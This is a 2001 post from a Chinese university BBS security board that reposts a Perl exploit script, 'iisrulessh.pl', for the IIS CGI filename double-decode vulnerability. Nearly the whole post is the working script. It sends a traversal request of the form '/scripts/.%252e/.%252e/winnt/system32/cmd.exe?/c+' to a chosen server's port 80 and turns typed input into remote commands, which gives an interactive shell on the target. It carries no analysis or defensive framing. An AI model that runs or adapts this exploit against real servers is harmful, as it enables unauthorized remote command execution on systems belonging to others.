荔园在线
荔园之美,在春之萌芽,在夏之绽放,在秋之收获,在冬之沉淀
[回到开始]
[上一篇][下一篇]
发信人: lvyou (让一切随风沉默), 信区: Security
标 题: IIS CGI Filename Decode exploit(perl script)
发信站: 荔园晨风BBS站 (Sat May 26 13:21:34 2001), 转信
发信人: scz (小四), 信区: Security WWW-POST
标 题: IIS CGI Filename Decode exploit(perl script)
发信站: 武汉白云黄鹤站 (Tue May 22 10:00:58 2001) , 转信
iisrulessh.pl
#!/usr/bin/perl
# A. Ramos (aka dAb)
#
use IO::Socket;
unless ($ARGV[0]) { print "$0 <server> [get]\n"; exit(1); }
$server=$ARGV[0];
$ARGV[1]="GET /scripts/.%252e/.%252e/winnt/system32/cmd.exe?/c+"
unless $ARGV[2]
;
sub send {
$socket = IO::Socket::INET->new(PeerAddr => $server,
PeerPort => 80,
Proto => "tcp",
Type => SOCK_STREAM)
or die "can't connect to: $server : $@\n";
print $socket $ARGV[1].$command." HTTP/1.0\n\n\n\n";
while(<$socket>) {
print;
}
close($socket);
}
while () {
print "issrules.sh> ";
while(<STDIN>) {
$command=$_;
last;
}
$command =~ s/\s/\+/g;
#$command =~ s/(\W)/sprintf("%%%x", ord($1))/eg;
&send($command);
}
--
也许有一天,他再从海上蓬蓬的雨点中升起,
飞向西来,再形成一道江流,再冲倒两旁的石壁,
再来寻夹岸的桃花。然而,我不敢说来生,也不敢信来生......
※ 来源:.武汉白云黄鹤站WWW bbs.whnet.edu.cn. [FROM: 211.167.65.123]
--
欢迎访问我的网站:
http://192.168.28.29
※ 来源:·荔园晨风BBS站 bbs.szu.edu.cn·[FROM: 192.168.28.29]
[回到开始]
[上一篇][下一篇]
荔园在线首页 友情链接:深圳大学 深大招生 荔园晨风BBS S-Term软件 网络书店